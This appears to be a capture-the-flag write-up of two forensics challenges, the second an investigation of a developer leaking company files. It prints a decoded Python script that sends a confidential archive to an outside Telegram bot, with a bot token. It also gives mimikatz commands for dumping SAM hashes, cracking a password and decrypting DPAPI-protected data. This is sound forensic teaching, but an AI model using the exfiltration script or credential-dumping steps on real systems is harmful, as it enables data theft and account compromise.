Hi, I’m glad to share with you my writeup for getting first blood in 2/2 DFIR challenges.

First Challenge: “the Frontdoor” FIRST BLOOD🩸

in this challenge, we have a linux disk image, we need to investigate it to get the correct answer. reading the bash history or “.zsh_history” we can view that there’s a lot of file navigations commands, and Git activity in “MyProject” which located in /home/Documents.

also, while i was digging around all linux files, i found an xml file “recently-used.xml” located in “/home/kali/.local/share/recently-used.xml”. this xml tracks that he opened /home/kali/Documents/MyProject/.git/config file using Mousepad and Thunar “kali linux gui”.

so, configfile will be first file to check in MyProjectdirectory

we can see there’s a beautiful base64 encoded that contains our flag:

IEEE{192.168.213.68:3421}

Second Challenge: “Lay-off” FIRST BLOOD🩸

this one was so challenging, we got 14 questions that needs to be answered correctly to get our very precious flag

=== Question Menu ===
Unanswered:
  1) What is the full name of the employee who sent the email?
  2) When was QR Tag company founded? (format: year)
  3) What website did the developer log into at 2025-09-18 17:56:51?
  4) what was the first thing the developer looked for after receiving the email?
  5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?
  6) Can you determine the number of files have been leaked?
  7) When did this archive get deleted?
  8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?
  9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)
  10) Which telegram API did the developer use to send the archive to the bot?
  11) What is the username and password of the database used in QR Tag website? (format: username:password)
  12) What version of express did the developer use?
  13) What service will the QR Tag partnership provide?
  14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?

we have a windows disk image, and an email :

1) What is the full name of the employee who sent the email?

open the email with thunderbird, you'll find the correct answer easily:

1) What is the full name of the employee who sent the email? --> Huda Ahmed

2) When was QR Tag company founded? (format: year)

with an online research on linkedin, we'll find in image with same name located in Egypt, Ismailia.

2) When was QR Tag company founded? (format: year) --> 2024

3) What website did the developer log into at 2025-09-18 17:56:51?

“log into” , by checking the Microsoft edge History database, which located in: C:\Users\<username>\AppData\Local\Microsoft\Edge\User Data\<Profile>\History

in urls table, sort them by time and go to the following website to decode the time:

3) What website did the developer log into at 2025-09-18 17:56:51?
   Answer: www.qrtagapp.com

4) what was the first thing the developer looked for after receiving the email?

using thunderbird, open the email with message source, or open the email with any text editor:

so, the correct time must be “2025–09–19 00:08:59” in GMT +3

now let’s find anything intresting, but in the history database of firefox, located in: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<profile folder>\places.sqlite

you'll find that, the most recent search after the email was send was all these searches in “moz_places” table:

4) what was the first thing the developer looked for after receiving the email?
      Answer: telegram leaks channels

5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?

this was a little dizzy, but what i did was parsing the prefetch files with PECMD here, and see if there any zip, rar, 7z, gz and so on.

And yes, i found the prefetch data for using 7z.exe:

now let’s check for all files referenced, we can see a 7z file located on MHANY’s desktop:

5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?
   CONFIDENTIAL.7Z

6) Can you determine the number of files have been leaked?

that’s so simple, in the prefetch we did parse we can view all files that was compressed and have been leaked:

just count all files below CONFIDENTIAL.7Z file:

6) Can you determine the number of files have been leaked? --> 11

7) When did this archive get deleted?

parsing the $J file with MFTECMD here, which located inC:\$Extend\$J
to see all File creation, deletion, renaming timestamps.

we got the deleted timestamp correctly, 9/19/2025 8:05:17 AM GMT 0.

convert it to the correct format for the flag answer, and add 3 hours to become GMT +3 as the Local Egyptian Time, then subtract 1 sec.

7) When did this archive get deleted?
   Answer: 2025-09-19 11:05:16

8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?

this question needs deep investigation, and a good eyesight to catch malicious scripts. found a python file in temp called botscript.py full path: C:\Users\mhany\AppData\Local\temp\botscript.py that contains a too long base64 encoded string:

it’s not just encoded, it’s reversed. And that’s because of this:

b64decode(__[::-1]);

so let's reverse it first, and decode the base64 here

import requests
I1lI11llIIl1 = "8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw"
1Ill1IIl11 = "5321402519"
l1II1ll1II = r'C:\Users\mhany\Desktop\Confidential.7z'
url = f"https://api.telegram.org/bot{I1lI11llIIl1}/sendDocument"
with open(l1II1ll1II, "rb") as f:
    response = requests.post(url, data={"chat_id": 1Ill1IIl11}, files={"document": f})
if response.status_code == 200:
    print("File sent successfully")
else:
    print("Error:", response.text)

so, he sends the data over telegram bot using a python script

8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?
   Answer: python

9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)
10) Which telegram API did the developer use to send the archive to the bot?

from the decoded base64 text we can answer these 2 questions easily

import requests
I1lI11llIIl1 = "8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw"
1Ill1IIl11 = "5321402519"
l1II1ll1II = r'C:\Users\mhany\Desktop\Confidential.7z'
url = f"https://api.telegram.org/bot{I1lI11llIIl1}/sendDocument"
with open(l1II1ll1II, "rb") as f:
    response = requests.post(url, data={"chat_id": 1Ill1IIl11}, files={"document": f})
if response.status_code == 200:
    print("File sent successfully")
else:
    print("Error:", response.text)

simple python script. Read, Understand, Answer.

9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)
Answer: 8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw:5321402519
10) Which telegram API did the developer use to send the archive to the bot?
Answer: /sendDocument

11) What is the username and password of the database used in QR Tag website? (format: username:password)

since he is asking for the username, and password for the QR Tag website.

we can see there’s QRTag Portaldirectory on mhany’s desktop, that contains 2 other subdirectories (Backend &Frontend). checking the Backend directory, we can find .envfile with absolute path: C:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend\.env

11) What is the username and password of the database used in QR Tag website? (format: username:password)
Answer: H4ny:P@ssw0rd!

12) What version of express did the developer use?

In the same Backend directoryC:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend we'll find package.json file that holds the correct answer

12) What version of express did the developer use?
Answer: 4.19.2

13) What service will the QR Tag partnership provide?

checking the Docs directory which located in: C:\Users\mhany\Desktop\Work\QR Tag\Docs\ we can see there’s a pdf file calledpartnership_agreement.pdf “partnership”

13) What service will the QR Tag partnership provide?
Answer: identity verification and fraud prevention

14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?

Now, for the last juicy part.

in question 13, we could answer it with PDF file located in C:\Users\mhany\Desktop\Work\QR Tag\Docs\ directory.

So, while i was checking all other documents files, i found a file called finance.xlsx with a very strange magic bytes:

of course, it’s not the traditional hex values for an excel file. to be more clearer, there’s an another excel file called user_accounts.xlsx

See the difference!!!! finance.xlsx is definitely not an excel sheet file.

So, the question now, what it is actually ?

and the question says “The developer used a security feature to securely encrypt a secret file”.

so this file is encrypted with a windows security feature i guess!!

if we did a quick research on the magic bytes on google 01 00 00 00 D0 8C, we can definitely get to the point.

also i did a very weird research, i uploaded the excel file on VirusTotal link (first one to upload this file) and by reading Details section, we can definitely make sure that this file contains DPAPI encrypted data (100%)

1. we need to recover the DPAPI masterky to decrypt the file data.

2. and to do recover the DPAPI masterkey, we need to decrypt the masterkey file. location: C\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>

3. and to decrypt the masterkey file, we need to recover the logon password for the user “mhany”

4. and to recover the logon password for this user, we need to decrypt SAM registry hive that contains the local account password hashes.

5. and to decrypt the SAM registry hive, we will need also theSYSTEMhive
which both are located in : C\Windows\System32\config\ directory

now we know what to do, let’s dig in using mimikatz “link”. running mimikatx .exe file with administrative powershell, then use these commands

privilege::debug  #Enables mimikatz to read protected data.
lsadump::sam /system:<SYSTEM Hive path>/sam:<SAM Hive path>  

reading the output, remember we are looking for NTLM hash for mhanyuser only

using rainbow-table attack with crackstation we can get the actual password for this hash

now we get the logon password, let’s recover the master key by decrypting the masterkey file. with mimikatz again, we can use these commands

sekurlsa::lgonpasswords   # Because we already have the logon password
dpapi::masterkey /in:"path to: C\Users\mhany\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" /password:"credentials"

now we can get the decrypted master key in hex.

final step, is to finally decrypt the encrypted finance.xlsx file with the key

dpapi::blob /in:"path to C:\Users\mhany\Desktop\Work\QR Tag\Docs\finance.xlsx" /masterkey:"d96486156b7651c31945791790941b62f180d198c06966e7e9568d594375c760cf528e6bf55a3bd6dc1bec079b38cbb569a222444ffce861b71a61330ddd1"

lets decode this encoded base64 data with cyberchef “link”

14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?
Answer: us1ng_m4st3r_k3y_t0_d3crypt_DPAPI_encrypt3d_s3cr3ts

now we can submit all answers and get the flag

IEEE{Ins1d3r_Thr34t_0r_Just_A_Mad_Dev3l0per}

Thanks For Reading, Hope you enjoyed❤️

Keep in touch with me via:

LinkedIn

Discord: prankster99